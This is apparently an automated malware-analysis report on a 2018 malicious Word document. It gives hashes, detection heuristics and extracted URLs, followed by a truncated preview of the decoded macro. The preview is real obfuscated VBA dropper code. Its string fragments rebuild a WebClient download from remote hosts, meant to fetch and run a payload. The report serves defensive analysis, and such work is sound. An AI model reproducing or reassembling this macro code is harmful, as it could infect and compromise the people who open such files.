Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d007c2ec4483fcd4…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 295.0 KB
Created: 2018-01-04 15:16:00
Authoring application: Microsoft Office Word
First seen: 2018-01-08

MD5: 8aa6fbeffbafd1f6a884d8e210ca3e52
SHA-1: 2655389bee1a47414f0be75d17701e2fae296d79
SHA-256: d007c2ec4483fcd4dbf67233956b194d3a3a46426f700282ea7b01785a10fc50

Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains a legacy WordBasic AutoOpen macro that uses the Shell() function. This indicates an attempt to execute external code, most likely to download and run a secondary payload. The presence of obfuscated URLs and the ClamAV detection signature 'Img.Dropper.PhishingLure-6443153-0' further support dropper functionality.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs (channel in brackets):
    • http://wjtT+jtTww.j [In document text (OLE body)]
    • http://www.4GJH1kPiatW8RiWIviwjiw� [In document text (OLE body)]
    • http://www.4GJH1kPiatW8RiWIviwjiw [In document text (OLE body)]
    • http://schemas.openxmlformats.org/drawingml/2006/main [In document text (OLE body)]

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 112571 bytes
SHA-256: 4e05268c825a6302e1221910a59cf7787b7fac87c76d1365abe4b7dec99e3e08

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "LqkjuiTGV"
Function UIIanfdZXCA()
On Error Resume Next
BFULLPF = 90 / Sqr(5) + BThWMsvVF / CBool(nqaTnLq * Sin(461)) * (6739 - 4 / (YEvwUjzumfduQE * RfzsfLWMhJ + VTksowFcU - ChrB(3))) + 90 / Sqr(5) + REzwWSFQrK / CBool(iTIooSLiBrOn * Sin(461)) * (6739 - 4 / (NjJurfo * kwAaAuItQwpwj + AbDAfutShDQvl - ChrB(3)))
wBBJdsRKmlZ = 90 / Sqr(5) + PwXPWkvMqmBw / CBool(cQOjwujmaHsZK * Sin(461)) * (6739 - 4 / (qmKVKsijcc * qtYAipFMLLFuA + MjvopfpLN - ChrB(3))) + 90 / Sqr(5) + ZjRqEIw / CBool(lqFAHlsSmMwLl * Sin(461)) * (6739 - 4 / (JEwInrnzAijTa * YOICORJ + KLcJwWsd - ChrB(3)))
qbdKYzkPFQv = AFMiUMZcGJ + Mid("KBVR'.NjtT+jtTet.WebjtT+jtTCjtT+jtTljtBN1T9fw7N06FkJ9u", 5, 34) + oVIhMGP
zBiasawNcdb = 90 / Sqr(5) + ILYMVuwVINnYC / CBool(luYoWZfiqqzuv * Sin(461)) * (6739 - 4 / (QzKEISkEX * clpfTqMHrEh + ibZLKaVhMbzj - ChrB(3))) + 90 / Sqr(5) + LDjPkEj / CBool(vMkkAOzdsC * Sin(461)) * (6739 - 4 / (kiTifzHJjqRBm * bIndsGzA + iPoaKLVDT - ChrB(3)))
mCuwjTGaf = 90 / Sqr(5) + frEimiSKjZwLaF / CBool(bTkONifiPCqzT * Sin(461)) * (6739 - 4 / (TwjbYXmHVwYA * CFPjuZWQpH + jSzIojwjz - ChrB(3))) + 90 / Sqr(5) + McPkChEUzl / CBool(NGdcAVvZwWipT * Sin(461)) * (6739 - 4 / (FYdSpCpABpcAwr * RwrVaSMWfoLAJ + AinvpzJ - ChrB(3)))
JzRwrpQYi = 90 / Sqr(5) + kSqXwwOmz / CBool(dLAQRZadEDi * Sin(461)) * (6739 - 4 / (EqzlEID * dQMLHCNujw + uhjURYquaZSm - ChrB(3))) + 90 / Sqr(5) + jfNzZLtFidwM / CBool(pIPMjwIUnXVVjN * Sin(461)) * (6739 - 4 / (OduLdffcp * UVDdMElHS + ifNsViMsIsdt - ChrB(3)))
pZXkSdhCZ = IwarVDRduz + Mid("DYSqrEbfFis0G1BKbJ2wd+2wdT1, 343245jtT+jtT);5jtT+jtTtIjtT+jtThjtT+jtTuas jtT+jtT=jtT+jtT jtT+jtT5tIenv:2wd+2wdpubl2wd+2wdic jtT+jtT+ UHjtT+jtTWjtTbpwkYjs2k", 19, 128) + iLwcZGMAAvrj
CjkPHzEj = 90 / Sqr(5) + BIjAMFnAAYE / CBool(famTtctCzidB * Sin(461)) * (6739 - 4 / (wAHpEGuiquj * aGGifnmwcXaw + BNDHdXihVO - ChrB(3))) + 90 / Sqr(5) + jLvRJzo / CBool(CjTVmTSqrFD * Sin(461)) * (6739 - 4 / (ZKUCtrbNWFE * sBBUrUn + jvtnirQnKjm - ChrB(3)))
luPHkqTJV = 90 / Sqr(5) + iizbOHXzIriAsi / CBool(EFphOaO * Sin(461)) * (6739 - 4 / (sFnrZOjjhU * MhjkNXIRqSWa + lssUNaqZ - ChrB(3))) + 90 / Sqr(5) + JEVaQwiZLw / CBool(KWYVUcJGIYH * Sin(461)) * (6739 - 4 / (ifGjVOTHdI * YfPmHJiQHZvwO + XzkRkQvChq - ChrB(3)))
NaMmpDXTSf = 90 / Sqr(5) + CaoDpScnEU / CBool(dwwVFIlwLUN * Sin(461)) * (6739 - 4 / (VMhPJrvCEKY * rjXTizaYRl + AbzUjsUUzo - ChrB(3))) + 90 / Sqr(5) + SqHCTvJSbTZadW / CBool(RRMupNjsjoLX * Sin(461)) * (6739 - 4 / (JjpZhvQj * bffPwKAb + TwzaDHF - ChrB(3)))
KHSVDKw = SnjVqsYRXaJ + Mid("hotTrapas jtT+jtT2wd+2wd= 5tIj'+'tT+jtTnsjtKBrUBzrINU8wcQ8", 3, 41) + bNdlRzzXSariRj
TUibdWlU = 90 / Sqr(5) + JRMLroBBiAqFpB / CBool(ZIzzjjrMwOiqtr * Sin(461)) * (6739 - 4 / (VzZrwrWEQltwjT * uuPnrnCkGORE + zIwIJjisj - ChrB(3))) + 90 / Sqr(5) + DFDDjLqjItRTob / CBool(AITMScj * Sin(461)) * (6739 - 4 / (IHHmknAooOwLi * kSYQiJLzdUXDJ + LjNWXRvvcZF - ChrB(3)))
SwMSGZqi = 90 / Sqr(5) + bbDCQMU / CBool(JGPJYnPjHVvFr * Sin(461)) * (6739 - 4 / (uUHuFQLciCbbav * JssuadZtDiKo + uUvfKhjiv - ChrB(3))) + 90 / Sqr(5) + GEjjcMhzNT / CBool(wdDKRQUaDLubsi * Sin(461)) * (6739 - 4 / (HwRtOwOW * quwzhVlzVTwr + VsQLHrKMcnwSF - ChrB(3)))
QzsClXds = 90 / Sqr(5) + QtoqzKiBGUYcH / CBool(zDLsLYAqkRo * Sin(461)) * (6739 - 4 / (YRibUESb * SjJorPV + qFLHBhWSQo - ChrB(3))) + 90 / Sqr(5) + oaJWCpm / CBool(TizUJjaiT * Sin(461)) * (6739 - 4 / (DUJiUtM * BWkLJEPRmfJ + HwEwCqqk - ChrB(3)))
OaZHalnilo = HEcFsPWLXAnBzX + Mid("3D7EDDT2ULkiTwvDXHv56DsBbwhi+jtTc.orjtT+jtTg/jtT+jtTsGfjtT+jtTyVQ7/2'+'wd+2wd,http://wjtT+jtTww.j'+'tT+'+'jtTm'+'edjtT+jtTnjtT+jtT'+'uclearjtT+jtTpej'+'tT+jtTru.jtT+jtTcom/jtT+jtTPjtT+jtTvjtT+jtT9rxao/UHW.jt8BQ", 29, 179) + KdnPhiZdIAZ
BCkKBrHlFG = 90 / Sqr(5) + fTFAjGSTWTXt / CBool(azGZlRPaYcDr * Sin(461)) * (6739 - 4 / (LZNHzibjFd * TMkZCWwoN + kOWOMBpK - ChrB(3))) + 90 / Sqr(5) + qBI
... (truncated)